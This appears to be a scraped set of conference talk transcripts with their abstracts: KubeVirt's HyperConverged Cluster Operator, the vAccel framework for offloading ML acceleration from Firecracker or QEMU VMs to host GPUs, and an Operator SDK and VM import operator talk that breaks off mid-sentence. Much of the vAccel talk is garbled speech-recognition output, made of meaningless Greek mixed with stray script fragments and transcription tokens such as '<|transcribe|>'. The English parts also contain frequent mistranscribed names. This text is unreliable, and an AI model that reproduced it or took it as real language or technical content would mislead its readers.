we want to aggregate conditions from other operator to report something back to VLM about the status of the VLM product. I don't want to enter into the details but you can find this schema on the GitHub repo. Let's see now a quick demo. In this demo I'm going to see what the user is supposed to do to install cubeVirt using the vapor-converged cluster operator on his OpenShift cluster. You can repeat this on OKD where the user interface is really similar and you can do it via CLI on plain Kubernetes. Here I need to go to the operator hub. I can find more than one catalog source. In this case I configured my cluster to consume all the special catalog source where I can see only my own operator. Here I have more than one apogradate channel. In my case I'm going to subscribe to a specific version. I want to choose my operator to run only onto a specific namespace in the cluster. This because cubeVirt is a kind of a control plane and I don't want to let any user in the cluster to play with it. We want to have the control plane in a specific namespace then each user will be able to start his virtual machines whenever he wants. He has the right to do that, but we don't want to let normal users interface with the control plane. Since our operator should be a singleton, our operator is going to create by itself a specific namespace and we are going to check that we are running there and only there. The perconverger cluster operator is not allowed to run into a namespace with a different name just because we want to be sure that we have only one copy of it. As you can see here, we are not going to ship all the possible... sorry, we are not going to let the user play with all the customer sources for all the components operator, but just with two special customer sources the perconverger cluster operator 1, which is the single entry point for the configuration and the odd path provisioner 1 just because it's a kind of special case so it's not converged into this one. When I'm ready, it's simply going to click on the install button. Here my cluster starts installing my operator. In the first row I can see what is currently happening but it's still not ready to create the customer source for my operator because the install is still in progress. At the end I will be ready to see my operator into that namespace. Here I can see what is happening. Depending on the download capabilities the install is going to take 4 minutes, nothing more. Here I can continuously see what is happening in real time. I can skip some part. When the operator is ready, as a cluster admin, I can create VCR to configure my operator and complete the install process. In order to do that, I have just to click here basically on the next button. Here I'm going to see a new I-form where I can configure values option of the product such as where I want to place my infrastructure components if I want to specify custom node affinity or whatever. This UI-form has been rendered automatically according to OpenAPI v3 definitions embedded into the CRD of the data converged CR. Of course I can also edit the jam. Here you see the spec stanza where you can configure what I want to see in my cluster and you also see the conditions that are consumed also by the UI. Now you see that the deployment is in progress. Other pods are being created. Here I'm watching only to the cube-virt type converged in space so all of these pods are required in order to prepare the run in opinionated version of the cube-virt. Here you see that it's still installing and you can see the conditions about what is happening on all the different components that are part of the whole product. Here as you can see we can create only a single kind of instance which is the CR for the vapor converged cluster operator. Now, sorry, we can see that we finally got the consigned complete conditions and available which means that the installed process properly and successfully concluded. And indeed if I come back to install the operators I see that my operator is finally green. These status, it's the way that OLM uses in order to communicate that our product has been successfully installed and it's properly configured without any errors. Here we see that all the conditions are in the desired state. We can also see some of the resources and all the events generated by our operator about what it did, so it created. We can see that it created a CR for CDI operator and so on. We can see that it created a CR for CDI operator, it created a config map, configure the storage cloud, plus it created a CR for the network operator, it created a CR for VM import operator. Next steps. Now in the demo installed the vapor converged cluster operator from a custom catalog source, but we are currently implementing a mechanism to automatically publish each new upstream release of the vapor converged cluster operator into the operator app. In this way all the community users will be able to easily find HCO into the operator app without the need to manually configure a special catalog source for that. Then we are going to continue integrating with the LM. In this session it talked a lot about conditions, where LM is currently consuming only the readiness probe of one pod, but in the future LM will be also going to directly consuming the conditions and we are going to continue with that integration to better communicate the status of our product to the LM to get it to be visualized into the mini UI and so on. And then we want to grow into the operator capability level. Operator capability level is a kind of maturity level for operators. We start from the simplest features like basic install. Now we are at a level 3, which means that we are able to support the whole lifecycle of the application, but we want to move, we are planning to move to a higher level. The next one, and we are working on this in the next one, is a deep insight, which means that the operator is able to continuously collect and watch alerts and log to provide us workload analysis and eventually fine tune its behavior according to the real workload in the specific cluster. And the final level is autopilot, that means that the operator is able to auto scale in the case of failure, and auto tune itself. It's able to automatically self heal in case of failures. This we need to introduce additional logic and implement additional knowledge into the operator. So, question and answer. Thank you.
KubeVirt enables developers to run Containerized Application and Virtual Machines in a common, shared Kubernetes/OKD/OpenShift environment. An Operator is a method of packaging, deploying and managing a Kubernetes/Openshift application. The Hyperconverged Cluster Operator is an unified operator deploying and controlling KubeVirt and several adjacent operators in a controlled and opinionated way. KubeVirt enables developers to run Containerized Application and Virtual Machines in a common, shared Kubernetes/OKD/OpenShift environment. An Operator is a method of packaging, deploying and managing a Kubernetes/OKD application. The Hyperconverged Cluster Operator is an unified operator deploying and controlling KubeVirt and several adjacent operators such as: - Containerized Data Importer - Scheduling, Scale and Performance - Cluster Network Addons - Node Maintenance - VM Import The Hyperconverged Cluster Operator delivers the domain-specific knowledge needed to orchestrate and automate the deployment and the upgrades of Kubevirt and its sibling operators in an opinionated and managed way. The Hyperconverged Cluster Operator can be installed on bare metal server clusters an a matter of minutes, even from a GUI, without requiring a deep knowledge of Kubernetes internals. The Hyperconverged Cluster Operator can be easily deployed in combination with rook.io to provide cloud native virtualization and distributed self-managing, self-scaling, self-healing storage services on a single cluster. An attendee will learn: - quick intro to KubeVirt technology (virtualization add-on for Kubernetes) - how to deploy and maintain it with the Hyperconverged Cluster Operator (deep-dive) - ongoing development and how to contribute
10.5446/52819 (DOI)
Σ catchesQuest Καθήι μου, δεύτερο όλοι είμαι Αναστασίας Νανας,利ππω χαλιός của τονJapaneseman<|hu|><|transcribe|>rio VXL, Λοιντ dale Αυτή η διαπρόεδροση exclusive, τον συγγροστρομ recibir уп wysστουί包 respected. Θαنتάλpa για καθένας η sand�� ανέχτες με τη να είναιák της.♪ Θα μιλήσουμε πως είναι brick, Pattern, Stephanская και αγ,​ για όσηέρχεται μέσω της ηisations του Clائd &app. Θα�ρήσουμε την απόξυγη Oder twelve. Στη mean, μόνο βρίσκονται πνεμέ τοουνάgangothe. Φ connotουμε μια δευτε chemotherapy καιناσκινεςซть άλυδεςSM〜 και δημιουργήσουμε τις επόμενες εξένειες της εξένειας. Σε να δούμε το αξινεργείο της εξένειας, το αξινεργείο της εξένειας, είναι σε έναν αμμάλιτενό εξένειας. Οι εξένειας, τα αυτοί που έχουν εξένειες, είναι αυτοί που έχουν σκέψει, απελευθεί, ή χρησιμοποιήνες, σε ένα εξένειας εξένειας, σε ένα VN, σε ένα βορφλόν. Ενώ, δεν είναι πολύ αυτοί, πώς αυτές τις επόμενες εξένειες εξένειας της εξένειας. Πώς οι εξένειες της εξένειας μπορούν να είναι εξένειες διεξιωτικές σε ένα εξένειας εξένειας. Σε το κρίμα του εξένειας, οι εξένειας αντιμετωπίσουν με το εξένειας εξένειας. Αυτό δηλαδή, οι εξένειες πρέπει να κομμάσουν ότι είναι εξένειας και εξένειας. Αυτό, φυσικά, βάζει αυτοί που έχουν εξένειας, και όπως βλέπουμε, οι εξένειες δεν μπορούν να σκέψουν διεξιωτικές εξένειες, ευκολογικά. Ποitedозέτη ελλαγένεια είναι το επίrot Cowот. Οι εξένειες θυθάπ been<|pt|><|transcribe|> το воспροσ incluει τηros um trabalho. αντιμετωπίζει το τρανσφερματικό λαό, που είναι το τρανσφερματικό λαό. Αυτό δημιουργεί σημαντικό αυτηνό, όταν έρχεται το τρανσφερματικό λαό, ή και το κοντρολό μέσα. Όπως βλέπω, αυτή η δυσόπιση δεν είναι ολόγωσης για εμφραστραξιούς, όπου υπάρχουν λαόδια, όπως οι εμφραρμές, ή δυσόπισης, όπως το κλειό. Στην την ευκολογική ευκολογική, όπως μιλήσατε, οι ευκολογικές είναι προσπαθείς με το ευκολογικό δυσόπιση. Αυτό το δυσόπιση έχει the same characteristics as the hardware device. Επίσης, οι ευκολογικές πρέπει να προσπαθούν τα δυσόπιση πραγματικά, πάνω από το δυσόπισης, η εμφραρμή ευκολογική δυσόπιση είναι η ίδια με την δυσόπιση. Αυτό έρχεται με το αυτοσυκλήτητας, να έχουμε πολλές εξοδογές, ή εξοδογές, κάνω το ίδιο δρόμο. Αυτό είναι το βμ σκέτουλο, όπου είναι με δυσόπισης προσπαθείς με το βcpu. Είναι το βμ σκέτουλο, που είναι με δυσόπισης βcpu με το φυσικό βcpu. Είναι το ραντήριας σύστημα του εξοδογές, να βρει τα δυσόπιση και στην εξοδογή που έχει το δυσόπισης. Παρακολουθούμε. Οι εξοδογές δεν αφήνουν, και σαν τους εξοδογές, η χαρδορκή εξοδογή είναι τώρα μάθαρξης από τις εξοδογές. Έχουμε δυσόπιση τρεις εξοδογές, που πρέπει να είναι έδρυσαν, για να υποσχεθεί η χαρδορκή εξοδογή, με τα εξοδογές, το εξοδογές, το αυτοσυκλήτητας. Οι εξοδογές δεν μπορούν να δείξουν, τι άλλες εξοδογές είναι ραμμένοι, με τα ίδια χαρδορκή. Έτσι, πρέπει να υποσχεθεί μια δύο εξοδογή, μεταξύ των εξοδογών με τα ίδια χαρδορκή. Τα δύσκολη εξοδογή είναι η χαρδορκή εξοδογή. Οι εξοδογές δεν πρέπει να αφήνουν με το βένδο, και τα δύο εξοδογές. Ο χαρδορκός πρέπει να αυτοσυκλεί, η δύο εξοδογή, η δύο εξοδογή, μετά να δείξουν τι δύο εξοδογή είναι ραμμένοι. Τα τρίτη εξοδογή είναι η προγραμμότητα για χαρδορκές, για να δημιουργήσουν τους ασφαλές για δύο εξοδογές, δε θα ήθελα να παράδει τους ασφαλές. Ξεκινήσαμε να αντιμετρήσουμε αυτές τις ασφαλές, και να δοκιμάζουμε ασφαλές με την αξανιωτήρξη πρόσφαση, για να εξοδοχείται η χαρδορκή εξοδογή κομ empresονensitive or regarding διεύτερες έντισ του,εις δηλίδιοσυνο, καιες μυθ themselves. Ο τρίποποχος είναι αυτές οιtails,ора ότι οιandra θα αissesω βρισκissyνα μες το σπισττι intim boards ηςipper주고 και ασηλα να οιζει μέσα στις κίντεο Συγκεθετρί ακOWa 주�αστφ Kamen Ερρια παραλ παπτασ citation कό και στη Α raging ά contaminη γνετικ azul βα двиг<|zh|><|transcribe|> και��터 Calfeito, Security and Isolation. Οι Ε皆τοδραcές θαση στην οπαπτικά πολιτισμού. θέλουν να εξηγ Dell 앉ονται μέχρι καθικής σε εξαφαριέρίες components ή shit ήαξιαδια. Θα σημανωστευω. Θα μια τα Ciao, για να κάνουμε την μπα-μπλε inglés. Ναι, ευχαριστώ. Λοιπόν, δούμε ένα δίδιο αρχιτεξουργικός διεξίου της VXL-εκοσύστητας και της εξοδοσύνησης. Ο κορδός της VXL είναι το VXL-ραντάνιστικο σύστημα. Είναι το κορδό που εξοδοσύνει να χρησιμοποιήσει τα βιεξέλ-προγραμμία, που εξοδοσύνει να χρησιμοποιήσει τα βιεξέλ-προγραμμία, που είναι ένας οδηγιότητας οδηγιότητας ή οδηγιότητας αγνωστικής. Και, στις τρόπος, είναι εξοδοσύνησης για να εξοδοσύνει να χρησιμοποιήσει τα βιεξέλ-προγραμμία για να χρησιμοποιήσει τα βιεξέλ-προγραμμία, που μπορεί να εξοδοσύνει αυτά τα βιεξέλ-προγραμμία. Για να εξοδοσύνει αυτό, το ραντάνιστικο σύστημα είναι σπλητοί σε δύο λογικές κομπονέντες. Είναι ένα βασικό ραντάνιστικο σύστημα, VXL-ρ-τ, που είναι το κομπονέντες στις οποίες οι εξοδοσύνησης εξοδοσύνουν. Και το ραντάνιστικο σύστημα είναι να χρησιμοποιήσει με ένας εξοδοσύνησης, που είναι οι κομπονέντες, που καταξύνουν πώς να εξοδοσύνει ένα εξοδοσύνηση πραγματικά στον εξοδοσύνησης. Αυτή η μοδελή μας δημοφιέστηκε να συμβεί την εξοδοσύνηση από τα εξοδοσύνησης εξοδοσύνησης. Απέχεια το εξοδοσύνησης, εξοδοσύνησης με έναν βιντείδι, και να παίρνει την ίδια εξοδοσύνηση, μετά να μιλήσει ή να μιλήσει, να μεταφερθεί σε ένα άλλο χαγουρανό set-up. Κάθε VXL-πλαγγή εξοδοσύνησης εξοδοσύνησης της εξοδοσύνησης. Για παράδειγμα, μπορείς να έχεις το Zetson VXL-πλαγγή, καιεται πάνω όμως έναιξοδοσύνηση έραβνη από το Zetson inference framework για να μεταφερσεκωθεί tear- allocation, such as classification detection or segmentation, και μπορείς να μεταφερθεί απόkillettevина, τί και να την παρεάνεται με αγα площадques όχι σε όυτες vulnerable group. Τ Bizim χemment being particularly powerful η além χ Shall Grantter was ανειδοφασινότητα πουphones Τα προσφαλήτητα που θέλουμε είναι να μπορούμε να εξεκουσύνουμε όλους τους δυο χαρδίου, αλλά και να εξεκουσύνουμε την ίδια εξεκουσία που θα είναι εύκολο να εξεκουσύνουμε το μπέα μεταλ<|zh|><|transcribe|> opposiekm, 现在的团 CCP Absolutely超 never雘飾t ro發作 με το βιρτω-ΑΕΩ αξιλ-δευάι, που βιρτω-ΑΕΩ αξιλ-δευάι, και είναι ουσιασμένο να αφήρξει πρόσφυγες από το inside-eVM στον κόσμο, που είναι ουσιασμένο να αφήρξει στον κατασκευό αξιλ-δευάι. Στον τέτοιο, έχουμε το βιρτω-ΑΕΩ αξιλ-δευάι, που έχει σχεδόνει στον κόσμο, όταν παρακολουθεί ένας αυτοπλικασμός inside-eVM, που αφήρξει με το βιρτω-ΑΕΩ αξιλ-δευάι, που είναι ένα βιρτω-ΑΕΩ αξιλ-δευάι, που αφήρξει στον κόσμο. Στον τρόπο, έχουμε το ίδιο απλικασμό που βρει στον κόσμο, ή στον κόσμο. Στον τέτοιο, έχουμε αφήρξει ένα σύστημα πρόσφυγου, που παρακολουθεί στις εξεκουατές, ή ένα κεμου-ΑΕΩ αξιλ-δευάι, και ένα αυτοπλικασμό αξιλ-δευάι. Έχουμε ένα δυνατό βιρτω-ΑΕΩ αξιλ-δευάι, που αφήρξει το βιρτω-ΑΕΩ αξιλ-δευάι, και να προτείνει στις σύστημα πρόσφυγου. Στον τρόπο, έχουμε αυτοπλικασμό που αφήρξει, ένα που παρακολουθείει πάντα at Zetson's��ς Transforming to Accelerate Image Operations, ένα okay cell πaltaδικ-�的是 βαζούτη from BLAS, και που παρακολουθεί κέρνenta τμέ одной μσχυσμώσυρσης, ό returned-πλαγ-Ι, και βασικά έχουμε δυσκώσυρη Σ-Οππραιμπό τηρν subsidi... Και τέλος, η τελευταία της σύμφωνας της ευρωπαίτης μας είναι η παραβουλτουργία, που παίρνει το μπροστάδρος. Είναι ένας λινουργικός λινουργικός μοδιουλίς, που κατασκευόνει για κάθε κανένα πόλεμο 5.4. Και η κατασκευή εμπλεμματική, η κατασκευή εμπλεμματική για κεμό και φάρκρακε. Για να καταστρέψω λίγο το μπροστάδρο και το ευρωπαίτης της ευρωπαίτης, θα δούμε το παράδειγμα της ευρωπαίτης εμπλεμματικής εμπλεγματικής, που παίρνει κάθε κατασκευή εμπλεγματική, σχετικά από την ευρωπαίτηση, που απασχερώνει μέσα ένα VM, λίγο το VXL ραντάκι συστήμα μέσα ένα VM με το VIRTIO πλαιγγό μοδιουλί, που αφορά το VIRTIO, το υπερισίωτο εμπλεμματικό της ευρωπαίτης της ευρωπαίτης, και then the hypervisor itself links against the VXL runtime system on the host this time, which instead of the VIRT-IO plugin module, it uses ZZ on inference module to offload the operation on an NVIDIA GPU. So when the user application calls image classification, the VXL runtime is triggered and it does a few things. The first thing it does is that it looks for a plugin that implements that operation and if found it's going to offload the operation to it, to that plugin. So in this particular example, the VIRT-IO plugin does implement image classifier operation, so the execution is passed to the code of the VIRT-IO VXL plugin. The plugin itself is going to just check if the VIRT-IO device is present and translate the call into an IOCTL request with all the arguments of the operation. Once the IOCTL request is sent, the frontend driver is going to take care of creating a VIRT-IO request. It's going to pack inside the request the operation type, in this case image classification, and along with the arguments of the operation, it's going to insert the request inside the VIRT-Q and then kick the VIRT-Q, which in turn is going to cause an exit in the hypervisor. The VIRT-IO Excel specific code of the hypervisor is going to pass the request, validate the request itself, it's going to see if it does support the operation and the arguments being passed are same, and in turn it's going to call the image classification API, the VXL API of the runtime system living on the host. The runtime system living on the host is going to do exactly the same steps as the one inside the VIRT-IO. It's going to look for a backend plugin that implements image classification and it's going to upload the execution to it. In this case we have loaded the Zetson inference VXL plugin, so the execution is going to pass to this plugin, which will perform the CUDA calls to the GPU device residing on the host and performing the actual computation. So this is our framework, this is how a complete workflow of our framework is working today and you can try it yourself. We're going to show later on a demo doing exactly that. Now our future steps are summarized in the following slide. First we would like to stabilize the user-facing API. We are done with integrating the virus components and finished with porting VXL to the Firecracker hypervisor. We want next to develop more backend plugins so that we can target more accelerator devices and expose to the final user, to the end user, more acceleratable functions. The other thing we want to investigate is the transport layer for offloading execution from inside the VM to the host. At the moment as we saw we are using the tailored VIRT-IO device that we designed and implemented for VXL, but there are other options. The problem with the VIRT-IO Excel module, despite the fact that provides very little overhead since it is tailored exactly for the API of VXL, is that it gives the final design that very tightly combines the VXL API and runtime with the hypervisor and the kernel module itself. That means that every time we change something in the API or the runtime itself we need to perform the corresponding changes to both the hypervisor and the VIRT-IO front-end module, which can be a tedious work and very problem-prone. Alternatives exist such as the VIRT-IO socket device, which essentially provides a channel from inside the guest to the host through sockets and this would decouple the implementation of the runtime and interface from the hypervisor and the kernel module and it would allow us to migrate to any hypervisor that actually implements the socket. In the future potentially with a small overhead cost due to the more generic protocol that it needs to be used. Finally we want to look into security, into the security semantics of VXL, For example we want to provide stronger guarantees for isolation between different contexts using different guests using the same accelerator device, avoiding for example data poisoning attacks and also ensure that the users of the host device are certified and they are allowed to actually use that device and finally and as well provide bindings for more high-level programming languages. Now let's jump to a small demo that is going to show you the functionality of VXL and the workflow of running a VXL application both on bare metal and the VIRT. Okay let me now switch my window to the demo. So I will be using for this demo a simple application that is essentially an HTTP server that routes, posts, requests and a particular URL to a handler that uses the VXL API to classify an image. The image is served inside the, is passed inside the body of the host request. So here is our application. It is interesting to see that the application indeed is only linked against the base VXL runtime system. It is not linked against any hardware specific library like CUDA or anything of the like. I am at the moment running on an x86 machine with a GeForce RTX 2060 so I will want to use the ZSUN inference plug-in to run the computation. You can tell the runtime that it, which backend plug-in to use by exporting this environment valuable and saying and pointing it to the dynamic library that implements the plug-in. So in our case it's going to be this. Okay and let's start the application. Okay let's see where we get here. So the application bootstrapped the runtime system at the beginning bootstrap and it loaded the available plugins. At the moment we found the ZSUN inference plug-in and it registered all the functions that that plug-in implements all the VXL functions that the display implements which in this case is image classification, detection and segmentation. So now I'm going to send a post request through Kerl to the server and see what happens. On the top right pane of my window I have NV top running which is going to show us any action on the GPU so if everything runs okay we should see some action here. I will be using a set of images from the Google net pretrained model and the application itself is using the Google net model to in this case to classify the input. So here it goes. We send a post request to this url. Okay and we pass the image as raw binary from here. Okay a few things happened here. First we can see that NV top reports some utilization on the GPU. Second we see that our request received a response in this body. The response includes the host name of the machine that the HTTP server is running on and the tags of the image classification. On the application itself we see some action so the application received the request. It created a new VXL session and what happens next is that upon calling image classification the VXLRT is looking for an available implementation for this operation. So it finds such an implementation in the Zetzone inference plugin and it affloats the computation to the Zetzone inference plugin with intent of affloats it to the GPU. Perfect. So let's see how we can do the exact same thing but running in a firecracker vm. So i'm gonna launch a firecracker vm. Let me see. I'm gonna launch a firecracker vm. Okay. So in here there is already a web classify binary which i am gonna delete so i'm gonna show you that we're gonna you we will be using the exact same binary that we used before. So from here i'm gonna SCP the binary that we used before in the vm and i'm gonna SSH it from here. So we have again the web classify image here. So let's launch it. In this case we need to use a different plugin we need to use a virtio plugin. So i'm gonna So the application launched here is going to be using the virtio plugin whereas firecracker itself it is linked against the vxl runtime and it's using the zson plugin as we exported the environment variable before on the host. So i'm just launching the classify binary. We see the same bootstrap sequence vxl is initializing it's looking for available plugins it finds the virtio excel plugin it registers the functions that this plugin exposes among them is very much classification function which we are interested in and our server is run. So let's do what exactly we did before but point to this new server. Right. So similar things happened. We do see action on the gpu that is good it means that our request from inside the vm it was offloaded on the host and in the gpu. We got our response now it is this host that answers us is the server running, let's do the server running inside the vm and we got again the tags of the request inside the vm a new session was created the implementation was is looking for a plugin implementing the image classification it finds an implementation avatar or excel plugin and it's executing the image classification code using the virtio excel plugin. The virtio excel plugin is using the excel device to offload the request on the host and here in fact we see that the runtime the vxcel runtime that is linked with firecracker is itself creating a session id in fact all session handling is happening on the host so the host should know exactly who is running and isolating the sessions between the users. It is itself looking for a plugin implementing image classification. In this case on the host we have the z so the first plugin load it so that is the code that executes it uses imaginette to classify and return the result from here to here and back from the application and a response to our curl request. So that was it let's move back to the presentation. Okay, summarizing we presented vxcel which provides a user-friendly and intuitive api for writing applications that want to access accelerator hardware accelerator capabilities. The design of vxcel enables inherently code portability it is trivial to migrate an application written with vxcel framework since there is actually no device specific code linked into the application. We can enable through the vm capabilities of vxcel allowing the application vxcel application to run inside the vm we can isolate the application from the hardware completely and all this comes of course at some cost the cost that we have to pay is that someone needs to write the code for implementing the vxcel api lowering the vxcel api to particular hardware devices for example a serverless offering should that run a serverless platform that runs on a particular hardware device needs to make sure that they own the plugins that implement the vxcel api for this device and of course we need to take into account security implications regarding sharing hardware resources. The vm boundary does provide isolation but still the users access the same hardware device. Thank you very much for attending. I would like to invite you to see these other presentations we have related with vxcel if you find vxcel interesting indeed. In the containers dev room you can see our work for porting vxcel to a k kubernetes cluster using kata containers and aws firecracker and finally you can see in the micro kernels dev room our effort in porting vxcel in two popular unikernel frameworks ramparan and unikraft. Finally i would like to acknowledge the fact that this work has been funded by the 5g complete horizon 2020 project.
The debate on how to deploy applications, monoliths or micro services, is in full swing. Part of this discussion relates to how the new paradigm incorporates support for accessing accelerators, e.g. GPUs, FPGAs. That kind of support has been made available to traditional programming models the last couple of decades and its tooling has evolved to be stable and standardized (eg. CUDA, OpenCL/OpenACC, Tensorflow etc.). On the other hand, what does it mean for a highly distributed application instance (i.e. a Serverless deployment) to access an accelerator? Should the function invoked to classify an image, for instance, link against the whole acceleration runtime and program the hardware device itself? It seems quite counter-intuitive to create such bloated functions. Things get more complicated when we consider the low-level layers of the service architecture. To ensure user and data isolation, infrastructure providers employ virtualization techniques. However, generic hardware accelerators are not designed to be shared by multiple untrusted tenants. Current solutions (device passthrough, API-remoting) impose inflexible setups, present security trade-offs and add significant performance overheads. To this end, we introduce vAccel, a lightweight framework to expose hardware acceleration functionality to VM tenants. Our framework is based on a thin runtime system, vAccelRT, which is, essentially, an acceleration API: it offers support for a set of operators that use generic hardware acceleration frameworks to increase performance, such as machine learning and linear algebra operators. vAccelRT abstracts away any hardware/vendor-specific code by employing a modular design where backends implement bindings for popular acceleration frameworks and the frontend exposes a function prototype for each available acceleration function. On top of that, using an optimized paravirtual interface, vAccelRT is exposed to a VM’s user-space, where applications can benefit from hardware acceleration via a simple function call. In this talk we present the design and implementation of vAccel on two KVM VMMs: QEMU and AWS Firecracker. We go through a brief design description and focus on the key aspects of enabling hardware acceleration for machine learning inference for ligthweight VMs both on x86_64 and aarch64 architectures. Our current implementation supports jetson-inference & TensorRT, as well as Google Coral TPU, while facilitating integration with NVIDIA GPUs (CUDA) and Intel Iris GPUs (OpenCL).
10.5446/52820 (DOI)
Hi, today I will tell you about a tool we've developed to allow Kubernetes users to import virtual machines from Ovid or VMware to Qvirt. My name is Jakub John and I'm a Senior Software Engineer at Red Hat. I'm one of the VMware and Import Operator developers. I'm a Season Java developer and BabyGo developer. In my free time I'm a Polish Java user group co-leader and Geekon conference co-founder and co-organizer. The agenda for the presentation is as follows. For starters, to establish context I will explain a few keywords that I will be using throughout the presentation. Next I will talk about the Operator SDK and how it can be used to build Kubernetes applications in Go. That will be followed by a demo. After the demo I will explain what the virtual machine import operator is and how it can be used. I will demo an actual virtual machine import from Ovid to Qvirt. Having basic understanding of the Operator SDK function will help in understanding how we used it to build the virtual machine import operator. After all of that I will move to a short summary. Without further ado let's move to the keywords. Starting with Ovid, which is an open source distributed virtualization solution designed to manage enterprise infrastructure. Ovid manages KVM based virtual machines. Qvirt is an open source technology that allows KVM virtual machines to be run as Kubernetes paths. CDI, Containerized Data Importer, is a service designed to import virtual machine images for use with Qvirt. CR stands for Custom Resource and that's an object that extends the Kubernetes API. CRD is Custom Resource Definition and that's a description of a custom data model in Kubernetes. Controllers are programs that observe the state of the cluster and make sure it is in a desired state. Operator is a piece of software that is capable of managing stateful applications or processes in Kubernetes. Piece of software that automates work that otherwise would have to be performed manually by a human operator on a system. For example, database deployment and configuration, upgrade. Operator is a specialized controller focused on its own CRD. Hypen Converge Cluster Operator is responsible for deploying and controlling Qvirt and several related operators. Let's talk about the Operator SDK first. Operator framework is a CNCF incubating project and it is built upon three pillars. Operator SDK, which is a development kit for building Kubernetes applications. It provides high level APIs, useful abstractions and project scaffolding. Second, Operator Lifecycle Manager that facilitates management of operators on a Kubernetes cluster and the last one, Operator Hub, which is a place for sharing operators. Operator SDK hides Kubernetes related complexity, especially one related to objects management, access and monitoring. This SDK provides robust scaffolding that can prepare working operator that only needs to be updated with resources definition and domain specific logic in gaps left in the code. No need to dig into an infrastructure code until it is really needed. The logic encapsulated within an operator is executed in a reconciliation loop that starts when there is a change to an observed resource. The responsibility of that code is to find out what changed and what is the new desired state of a managed resource, perform actions to move the managed resource towards the desired state and finally break the reconciliation cycle when the resources are at the desired state. The use case of an operator would be managing life cycle of a system comprising of multiple interconnected subsystems. Let's imagine a system of two multi-instance applications communicating through some messaging system and one of them using a database. It could be deployed on different kinds of infrastructure and managed manually by a human operator equipped with tons of automation scripts. The system is about to be migrated to Kubernetes. So it can look like that and be manageable. One option is to modify existing scripts and still execute them manually or create a software operator that can perform any operations human operator executed. For example, creating deployments with images in desired version and numbers of instances. Plug in and storage for DB and messaging, letting the applications know about each other, making upgrades of the components you name it. Having discussed the purpose of the operator's decay, let's see what is actually needed to create an operator with it. First we need to bootstrap the project. Next, we need to generate API code and update it with our domain specific details. Afterwards, when the data model is ready, we need to generate manifests that make the operator usable in a Kubernetes cluster. The actual logic behind processing our CR needs to be implemented in a designated place in the generated code. The last thing left to do it is to run it. Let's have a go at a demo. Let's create a directory for our project, eco operator. Inside that directory, let's execute operator SDK init command providing domain that will be used as the name of a group of our resources and repo that will be used as the name of our goal module. After operator SDK does its thing, we'll move to IDE to have a look at the generated code. There we go. We've got make file that we can use to build our project and execute other tasks. We've got main goal file that is the entry point for the application. We've got goal mod file which defines dependencies. We've got docker file for our images and several directories with manifests, with binaries and boilerplate command. Let's generate initial version of our API using create API command providing the name for our resource and the version. And let's request generation both of the resource and the controller. After operator SDK is done, we should see new directories in our project tree, API and controllers. There they are. API package contains versioned definition of our resource, echo, which contains specification which should correspond to information that is passed by the user to the operator and status that should represent information about processing of our CR reported by the operator. Resource package contains ecocontroller file which defines eco-reconciler structure that implements reconciler interface provided by the operator SDK. The reconciler method is executed whenever watch resource changes. Let's have a look at implementation. And here we can see room left for our logic to be implemented. And the information about CR changed are in the request parameter. The method returns result and error. If there is no error, the processing ends. Let's update our specification so it can be used in our operator properly. Let's define a message field of type string that will represent a message that we want the operator to print to its logs. In the status structure, let's put a field representing time stamp of the last message processing that will be updated by the operator upon processing of our message. It's good to comment our fields because those comments will be used in the schema definition of our CRD. We will see them a bit later. Now we can generate our boilerplate go code that's responsible for copying our objects. This is generated deep copy go file using make generate command. There we go, a lot of deep copy and deep copy objects methods. Let's generate manifests for our operator using make manifests command. And the manifests will be present in config CRD basis directory of our project. There it is, we have custom resource definition that has name echo designpl. The resource belongs to group designpl is of kind echo and it defines version view 1 and alpha 1 and it will be namespaced. There we can see the schema of our resource. There is the comment that we've put in the go code, same for last message timestamp. Let's update our eco controller to do what it needs to do. First we need to retrieve our echo object from the cluster using get method provided by the operator SDK to ease interactions with Kubernetes. We need to provide the name and the namespace of our object to be retrieved. So we use namespace name that came in the request. In case the object is not found in the cluster we want to stop processing because the object has been deleted. So we return no error and the result. Otherwise when there is some other error we return result and error. In that case the reconciling method will be re-executed. Now we can update the time in our echo object. Now we need to persist that object in the cluster using yet another method provided by the operator SDK or update for the status part of the object. In case of an error we will return result and the error which will again, retrigger reconciliation. After updating the object we can execute our logic so printing the message to the output and then we can return result and nail as an error which will end the reconciliation loop for that CR. Let's confirm that we don't have our CRD defined in the cluster. Yes, it's not present. Let's use make install to install our manifests in the cluster. Now we should see the CRD. Yes, there is. And we can execute make run to start our operator. And it's running, waiting for input. We can use another generated file residing in samples and directory. We change it to our needs so provide message. We apply the manifest against the Kubernetes cluster and we should see our message in the logs. Yes, it is but twice. The second message has been printed because the reconciliation method is executed every time the CR is updated. And we do update it inside the reconcile method so we see the message twice. Let's remove the second message by limiting sensitivity of our reconcile method to only changes to the specification. After starting the operator we should see only one message. And it prints the message because the CR already exists in the cluster so it reads it on startup. Now we can change our manifest and apply it against the cluster and see what happens. It's been changed and we can see the message. The CR changed so the reconciliation has been executed. If we execute the same application again we won't see the message because there is no change. Let's change the message back to the original one, apply it again and we will see the message again in the logs. Let's inspect our CR and see what's the status. Here we can see last message timestamp which corresponds to the time printed in logs. There it is. The only difference is in representation of the time. In one case it's UTC and in the other case it's Central European time so there is one hour difference in the printed message in this case. Here is the UTC one. Let's have a look at the virtual machine import operator. The Kubernetes is on the rise and thanks to its capabilities many developers and administrators want to migrate their workloads there and that is not always easy to ease that burden. We have created VM import operator that will automatically translate your VM configuration, copy its disks and start it on target Kubernetes cluster. The virtual machine operator is a Kubernetes operator so it's run within the cluster that is able to import compatible KVM and VMWare based virtual machines into that cluster where they would be run by QVM. Same compatible is important, not all options that are available in vanilla KVM hypervisor are available in QVM. The operator takes care of checking the source VM configuration and reports its finding to the user. For all VIRT the KVM based VMs disks are imported as they are. CDI copies them to Kubernetes storage. In case of VMWare additional step is required. Guest conversion using V2V after CDI copies the disk to Kubernetes storage. The virtual machine operator was written using the operator SDK in Go. And let's have a look at the environment of the VM import operator and its collaborators. As mentioned earlier the operator is deployed in a Kubernetes cluster. It runs in two pots. VM import operator and VM import controller. I will talk about the responsibilities a bit later. It reads or creates cluster objects like secrets, config maps, storage classes, jobs or network attachment definitions. The operator creates virtual machine objects which are supervised by QVIRT. CDI in turn is used to transfer disk images to Kubernetes storage. The last system that takes part in the import process is OVIRT that manages the imported machine. VM import operator reads metadata of the imported VM, requests shutdown for the import process and startup in case of an import failure. CDI in turn connects to the OVIRT to download the disk images and stores them in Kubernetes storage. Let's have a look how it works in practice. For the purpose of that presentation I have created a virtual machine in my OVIRT cluster. Let's have a note of 